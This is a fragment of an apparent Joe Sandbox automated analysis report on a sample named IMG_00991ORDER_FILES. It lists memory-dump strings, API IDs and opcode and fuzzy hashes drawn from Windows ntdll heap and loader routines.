                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                    • API String ID: 0-3061284088
                                                                                    • Opcode ID: 30e09f9182b29d6c08c728cee46614a25c401490cbeb7bdfa3fb19996cc773cb
                                                                                    • Instruction ID: 21bccc5f42a5c9e41e746e78f1215de85a4ca951064db542370eeec565b66332
                                                                                    • Opcode Fuzzy Hash: 30e09f9182b29d6c08c728cee46614a25c401490cbeb7bdfa3fb19996cc773cb
                                                                                    • Instruction Fuzzy Hash: 16014C7F1591409EE3068768E408F477BB8EB42731F1744DEE4058B992DFA69944E550
                                                                                    APIs
                                                                                    Strings
                                                                                    • kLsE, xrefs: 351D05FE
                                                                                    • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 351D0586
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                    • API String ID: 3446177414-2547482624
                                                                                    • Opcode ID: e1d58f8d461d24c2eeb3f3bbc8ed5f9f1a27aab836ce95979042ff7a6085a316
                                                                                    • Instruction ID: 6a2bd95538421d9a1fe435994094e1e47f9463701cbad7b63e40ab19142c8750
                                                                                    • Opcode Fuzzy Hash: e1d58f8d461d24c2eeb3f3bbc8ed5f9f1a27aab836ce95979042ff7a6085a316
                                                                                    • Instruction Fuzzy Hash: 5851ADB9A04746DFEB20DFA5C484ABAF7F5BF44340F00853ED99A93241EB749505CBA1
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 35208341
                                                                                    • @, xrefs: 352084B1
                                                                                    • LdrpInitializeProcess, xrefs: 35208342
                                                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 3520847E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-1918872054
                                                                                    • Opcode ID: 8d23d84e0f9df6b99df1306fbe8bcc9ad517143bc150aa4e1ed928e70ddd1a83
                                                                                    • Instruction ID: 89494044f4683872d31546a684a0a5f1c42539dce10a28aa89b28178a5e0548f
                                                                                    • Opcode Fuzzy Hash: 8d23d84e0f9df6b99df1306fbe8bcc9ad517143bc150aa4e1ed928e70ddd1a83
                                                                                    • Instruction Fuzzy Hash: F6917C75649345AEE762CE21C840FABBBE9BF84784F40092DFA8993151E734DA44CF62
                                                                                    Strings
                                                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 35241FE3, 352420BB
                                                                                    • .Local, xrefs: 352027F8
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 352420C0
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 35241FE8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                    • API String ID: 0-1239276146
                                                                                    • Opcode ID: a397ca137671b971d1d4c128dc1f538977a96b5a7dc3310ffccd07b5b20633fd
                                                                                    • Instruction ID: a38a37d16121446472ee1bcb56467c6cf038be426a9711a100f40ee8a8f0fa50
                                                                                    • Opcode Fuzzy Hash: a397ca137671b971d1d4c128dc1f538977a96b5a7dc3310ffccd07b5b20633fd
                                                                                    • Instruction Fuzzy Hash: 1CA1B079A0132E9FDB24CF64DC84B99B3B6BF68354F5101EAD809A7251DB709E81CF90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                    • API String ID: 0-2586055223
                                                                                    • Opcode ID: 8c958767611c6da37d0fdcc3289c74ac000455fe5148ca22f5d67f627e570735
                                                                                    • Instruction ID: a1763c72de284e5d62cb195cce46d7fcaa8338a94a95d421ce9a8eb566318f97
                                                                                    • Opcode Fuzzy Hash: 8c958767611c6da37d0fdcc3289c74ac000455fe5148ca22f5d67f627e570735
                                                                                    • Instruction Fuzzy Hash: 0061017A2087819FE311CB64C844F67B7E9FF88750F0509A9F9599B291DB34E900DB62
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                    • API String ID: 0-1391187441
                                                                                    • Opcode ID: 12a62a2d1120d2e5936af16a5422b1e940b5923c73f8da4ef800eb745db43d2f
                                                                                    • Instruction ID: 88611d908785d235488551412550655946aa14b44b6cfc81a3e9ff52d97d1a5a
                                                                                    • Opcode Fuzzy Hash: 12a62a2d1120d2e5936af16a5422b1e940b5923c73f8da4ef800eb745db43d2f
                                                                                    • Instruction Fuzzy Hash: 2E31D47AA00204EFDB01CB94CC84F9EB7B9FB44770F5140D5F905AB291D771EA40CA61
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion$e 5
                                                                                    • API String ID: 0-566261801
                                                                                    • Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                    • Instruction ID: a76252938e461063a82f589beeb7810d65b830afd6f18651339b3877f48a564b
                                                                                    • Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
                                                                                    • Instruction Fuzzy Hash: 65316FB2A00619BFDB12CB95CC44EDFBBB9EB84750F004025F914AB260DB30DA05CB90
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugPrintTimes
                                                                                    • String ID:
                                                                                    • API String ID: 3446177414-0
                                                                                    • Opcode ID: 04d2a45bb963a33d0b6e4b7deb2a051208c36bc720bad8344a8293c9a3404191
                                                                                    • Instruction ID: 9d43e12aa4ceab7338db1f63f11b43f98b66e1f2fbd523b125387cde0633f03e
                                                                                    • Opcode Fuzzy Hash: 04d2a45bb963a33d0b6e4b7deb2a051208c36bc720bad8344a8293c9a3404191
                                                                                    • Instruction Fuzzy Hash: D451EFB6A05706EFEB05CF64C885BADF7F6BF45355F10826AE406972D0DBB4A901CB80
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                                                                    • API String ID: 0-1168191160
                                                                                    • Opcode ID: 05a9c4f14ab786eb182caae3b8fd2614c739e61a8a9e624f2abb10bbeefc0a71
                                                                                    • Instruction ID: 9cfe087f5e32795d9168418d0264e7845cbb5357e721615118eda1382f28ddf6
                                                                                    • Opcode Fuzzy Hash: 05a9c4f14ab786eb182caae3b8fd2614c739e61a8a9e624f2abb10bbeefc0a71
                                                                                    • Instruction Fuzzy Hash: B0F19DB5A052298BDB21CB14CC90FD9B3B6FF54748F5440E9E509A7241EBB09EC1CF99
                                                                                    Strings
                                                                                    • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 351D1648
                                                                                    • HEAP[%wZ]: , xrefs: 351D1632
                                                                                    • HEAP: , xrefs: 351D14B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                    • API String ID: 0-3178619729
                                                                                    • Opcode ID: b546e68aff68ea7a6ea6691f25863700ba2cf9beed9eea71ce5adc8e85952e55
                                                                                    • Instruction ID: f6c63c6ae9981b2ef2fe2fc359dd0378e780ba5411a5e565db9c8380a283b0e4
                                                                                    • Opcode Fuzzy Hash: b546e68aff68ea7a6ea6691f25863700ba2cf9beed9eea71ce5adc8e85952e55
                                                                                    • Instruction Fuzzy Hash: 9CE1FF74A043859FE764CF68C491BBAFBF2BF49300F14895DE8968B246E774E940CB50
                                                                                    Strings
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 352400F1
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 352400C7
                                                                                    • RTL: Re-Waiting, xrefs: 35240128
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                    • API String ID: 0-2474120054
                                                                                    • Opcode ID: 24e2446a719e31d4bc254ae0d33c1a7da0c6000663ffa0f896eec577fd9e3923
                                                                                    • Instruction ID: d859f15c89fd88fe856d7281b3967544fdfabd10661aa8aa725e2c10f244e638
                                                                                    • Opcode Fuzzy Hash: 24e2446a719e31d4bc254ae0d33c1a7da0c6000663ffa0f896eec577fd9e3923
                                                                                    • Instruction Fuzzy Hash: 5FE1A0B56087419FE725CF28C880B1AB7E1BF84364F100B5DF5A98B2E1DBB5E945CB42
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                    • API String ID: 0-1145731471
                                                                                    • Opcode ID: 23b2efcbf7afa05022641d4c5ea706c072f6474858ad78ebb3e6a02516dfa61d
                                                                                    • Instruction ID: 2cf9ed4a60d41fb2c7f07bb2b110caca9c72a863934597331829222203c35a69
                                                                                    • Opcode Fuzzy Hash: 23b2efcbf7afa05022641d4c5ea706c072f6474858ad78ebb3e6a02516dfa61d
                                                                                    • Instruction Fuzzy Hash: 7DB199B5A067058FDB24CF69C991BAEB7B6BF54744F184529E852EB381D730E980CF04
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                    • API String ID: 0-2391371766
                                                                                    • Opcode ID: befe6c4cdd23b3fbefcf54e96931cb8d690cbd8cda638dd9e4258687e6218eb7
                                                                                    • Instruction ID: 1026c355b7fbeadbd13173d5680dda9daf3472866febee09d1792bef641309e0
                                                                                    • Opcode Fuzzy Hash: befe6c4cdd23b3fbefcf54e96931cb8d690cbd8cda638dd9e4258687e6218eb7
                                                                                    • Instruction Fuzzy Hash: 2AB19DB2618342AFE312CE55C884F5BF7F9BB54760F411D29FA459B281CB70E908CB96
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: FilterFullPath$UseFilter$\??\
                                                                                    • API String ID: 0-2779062949
                                                                                    • Opcode ID: 6679a65247d48744ab12bc479b01193b6d0cf2f93767684411790a51063f275b
                                                                                    • Instruction ID: e29c54fa9db49d22070e83d9b798acbd0d95de174f8438b375a7bcf99a1fb2ac
                                                                                    • Opcode Fuzzy Hash: 6679a65247d48744ab12bc479b01193b6d0cf2f93767684411790a51063f275b
                                                                                    • Instruction Fuzzy Hash: D7A15E799016299EDB62DF24CC88B9AB7B9FF04710F1001E9E90DA7250DB369F84CF90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                    • API String ID: 0-373624363
                                                                                    • Opcode ID: 540a9de33e676f190be82fa04c103e07e07f95a38eb915a172d206c1475d592a
                                                                                    • Instruction ID: 19ca8d347dfbf76945dd3341f6b3c2f985ba7b0b0df886933f305eb03baa6a82
                                                                                    • Opcode Fuzzy Hash: 540a9de33e676f190be82fa04c103e07e07f95a38eb915a172d206c1475d592a
                                                                                    • Instruction Fuzzy Hash: B091ADB5A09359CFEB21CF54C450BAEB7F1FF053A4F194199E816AB290D7789A80CF90
                                                                                    Strings
                                                                                    • HEAP[%wZ]: , xrefs: 3522E435
                                                                                    • HEAP: , xrefs: 3522E442
                                                                                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 3522E455
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                    • API String ID: 0-1340214556
                                                                                    • Opcode ID: 7aeadbd97745c41506e7d991b16c2b54d86daccac3b66046db4c5ab3638fb793
                                                                                    • Instruction ID: 2d3b7f316ea6dfaea43ac5306d2c1a2c991d63e3e887bbd9dc16450c88ae5fa3
                                                                                    • Opcode Fuzzy Hash: 7aeadbd97745c41506e7d991b16c2b54d86daccac3b66046db4c5ab3638fb793
                                                                                    • Instruction Fuzzy Hash: F9514139604784AFE316CBA8C884FAABBF9FF08740F0440E5E5419B692D774EA40DB50
                                                                                    Strings
                                                                                    • LdrpCompleteMapModule, xrefs: 3523A39D
                                                                                    • minkernel\ntdll\ldrmap.c, xrefs: 3523A3A7
                                                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 3523A396
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                    • API String ID: 0-1676968949
                                                                                    • Opcode ID: 4ab86f64abd23f9db4ca857c6ea3813c9abfed1fd06864d2f9917445ba5311f5
                                                                                    • Instruction ID: b89a437f5672797be9d383088692536f5db5a3523de1b177b0295b83a39046b8
                                                                                    • Opcode Fuzzy Hash: 4ab86f64abd23f9db4ca857c6ea3813c9abfed1fd06864d2f9917445ba5311f5
                                                                                    • Instruction Fuzzy Hash: F95133B8B45786DBE711CB68C945F1AB7F5FF02710F1206A5E9529B6E2DBB1E800CB40
                                                                                    Strings
                                                                                    • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3527D7B2
                                                                                    • HEAP[%wZ]: , xrefs: 3527D792
                                                                                    • HEAP: , xrefs: 3527D79F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                    • API String ID: 0-3815128232
                                                                                    • Opcode ID: 1282552a9371f2bb09d907aaeb0832cc51eb9ebbfcc4b2392b5d2921e308a873
                                                                                    • Instruction ID: 9f2d8ca0c4ce8f1b38062831e6ab9d2b000fc406297a4373f301ab5c4fed7a07
                                                                                    • Opcode Fuzzy Hash: 1282552a9371f2bb09d907aaeb0832cc51eb9ebbfcc4b2392b5d2921e308a873
                                                                                    • Instruction Fuzzy Hash: 2A5107791143518EF350CB29C84477277E2EF85284F9348CEE4CA8B687EA76E447DBA0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                    • API String ID: 0-1151232445
                                                                                    • Opcode ID: 80ef6879ea8765443840aede45c84d5db8214085603d4523af2c5f2ed94f286a
                                                                                    • Instruction ID: 2457134eb06bcebf3ad9e03b47e5c506a9b7d8e2c0df681cf36b609749cbcf12
                                                                                    • Opcode Fuzzy Hash: 80ef6879ea8765443840aede45c84d5db8214085603d4523af2c5f2ed94f286a
                                                                                    • Instruction Fuzzy Hash: 954168BD2043418FFB65CA28C480B6677A1AF15345F6640EDC84A8BA62CBF6D446CB61
                                                                                    Strings
                                                                                    • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 35241943
                                                                                    • LdrpAllocateTls, xrefs: 3524194A
                                                                                    • minkernel\ntdll\ldrtls.c, xrefs: 35241954
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                    • API String ID: 0-4274184382
                                                                                    • Opcode ID: 22959608d1c4d5e9912941df7ed9f95c616fca341d44242664e341e220643354
                                                                                    • Instruction ID: 257f06788045f15432457d840c6ad0212722ac0d9b3e2454e7325cfb1133086d
                                                                                    • Opcode Fuzzy Hash: 22959608d1c4d5e9912941df7ed9f95c616fca341d44242664e341e220643354
                                                                                    • Instruction Fuzzy Hash: 434189B5A01645EFDB09CFA9CC80BAEBBF2FF48300F058519E406A7252DB74A901CF90
                                                                                    Strings
                                                                                    • LdrpInitializeTls, xrefs: 35241851
                                                                                    • minkernel\ntdll\ldrtls.c, xrefs: 3524185B
                                                                                    • DLL "%wZ" has TLS information at %p, xrefs: 3524184A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                    • API String ID: 0-931879808
                                                                                    • Opcode ID: 270e5c6cce02f1b41b728aff5e76e8dc0ce815ce16c737000c7e7baf7a9581df
                                                                                    • Instruction ID: 6a824cf24bdfcab1809d387b3a994fea436bbf3b80d59fae2017816bbb458478
                                                                                    • Opcode Fuzzy Hash: 270e5c6cce02f1b41b728aff5e76e8dc0ce815ce16c737000c7e7baf7a9581df
                                                                                    • Instruction Fuzzy Hash: 4D31E272B21341AFE7108B55DC85F5A7BB9FF44784F010159E506BB181EBB0EE41CB90
                                                                                    Strings
                                                                                    • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 352585DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.6864033040.00000000351A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 351A0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.6864033040.00000000352CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_351a0000_IMG_00991ORDER_FILES.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                    • API String ID: 0-702105204
                                                                                    • Opcode ID: 01d3be6deae0f55c6bf4914f3a73a1baa9b09e749b248feb13cab5db6bece0ff
                                                                                    • Instruction ID: c81d3caaaab6608fc683b556e4dc5814c4d492211fbec1cdbb5355f72fe38fcf
                                                                                    • Opcode Fuzzy Hash: 01d3be6deae0f55c6bf4914f3a73a1baa9b09e749b248feb13cab5db6bece0ff
                                                                                    • Instruction Fuzzy Hash: BA01F7757142099FD7215A51DC48A66FBB7FF402B0F6109A8E90716493CFE0E849CA96
                                                                                    Strings
                                                                                    Memory Dump Source
